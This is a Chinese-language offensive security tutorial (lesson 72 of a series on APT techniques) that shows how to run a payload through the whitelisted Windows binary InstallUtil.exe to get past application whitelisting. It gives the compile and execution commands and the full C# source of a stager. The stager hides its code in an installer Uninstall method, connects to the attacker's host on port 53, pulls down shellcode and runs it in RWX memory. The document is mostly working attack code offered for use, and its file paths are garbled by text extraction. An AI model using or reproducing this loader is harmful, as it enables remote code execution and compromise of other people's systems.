第七十二課:基于白名單Installutil.exe執(zhí)行payload第二季
專注APT攻擊與防御
https://micropoor.blogspot.com/

Installutil簡介:
Installer工具是一個命令行實用程序,允許您通過執(zhí)行指定程序集中的安裝程序組件來安裝和卸載服務(wù)器資源。此工具與System.Configuration.Install命名空間中的類一起使用。
具體參考:Windows Installer部署
https://docs.microsoft.com/zh-cn/previous-versions/2kt85ked(v=vs.120)

說明:Installutil.exe所在路徑?jīng)]有被系統(tǒng)添加PATH環(huán)境變量中,因此,Installutil命令無法識別。

基于白名單installutil.exe配置payload:

Windows 7 默認(rèn)位置:
C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe
攻擊機(jī):192.168.1.4 Debian
靶機(jī): 192.168.1.3 Windows 7

配置攻擊機(jī)msf:
靶機(jī)執(zhí)行:

靶機(jī)編譯:

1 C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /r:System.Ente
rpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micr
opoor.exe /keyfile:C:UsersJohnDesktopinstallutil.snk /unsafe C:Users
JohnDesktopinstallutil.cs
payload:Micropoor.exe
靶機(jī)執(zhí)行:

1 C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe
附錄:Micropoor.cs
注:x64 payload

1 using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;
2 public class GQLBigHgUniLuVx {
3 public static void Main()
4 {
5 while(true)
6 {{ MessageBox.Show("doge"); Console.ReadLine();}}
7 }
8 }
9
10 [System.ComponentModel.RunInstaller(true)]
11 public class esxWUYUTWShqW : System.Configuration.Install.Installer
12 {
13 public override void Uninstall(System.Collections.IDictionary zWrdFAU
Hmunnu)
14 {
15 jkmhGrfzsKQeCG.LCIUtRN();
16 }
17 }
18
19 public class jkmhGrfzsKQeCG
20 { [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF,UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32KIheHEUxhAfOI);
21 [DllImport("kernel32")]private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp,IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
22 [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);
23 static byte[] ErlgHH(string ZwznjBJY, int KsMEeo) {
24 IPEndPoint qAmSXHOKCbGlysd = newIPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
25 Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
26 try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
27 catch { return null;}
28 byte[] UmquAHRnhhpuE = new byte[4];
29 XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0);
30 int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0);
31 byte[] qaYyFq = new byte[kFVRSNnpj + 5];
32 int SRCDELibA = 0;
33 while (SRCDELibA < kFVRSNnpj)
34 { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj‐ SRCDELibA) < 4096 ? (kFVRSNnpj ‐ SRCDELibA) : 4096, 0);}
35 byte[] TvvzOgPLqwcFFv =BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
36 Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4); qaYyFq[0] = 0xBF;
37 return qaYyFq;}
38 static void cmMtjerv(byte[] HEHUjJhkrNS) {
39 if (HEHUjJhkrNS != null) {
40 UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40);
41 Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
42 IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
43 UInt32 wdjYKFDCCf = 0;
44 IntPtr XVYcQxpp = IntPtr.Zero;
45 UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf);
46 WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF); }}
47
48 public static void LCIUtRN() {
49 byte[] IBtCWU = null; IBtCWU = ErlgHH("192.168.1.4", 53);
50 cmMtjerv(IBtCWU);
51 } }
Micropoor
?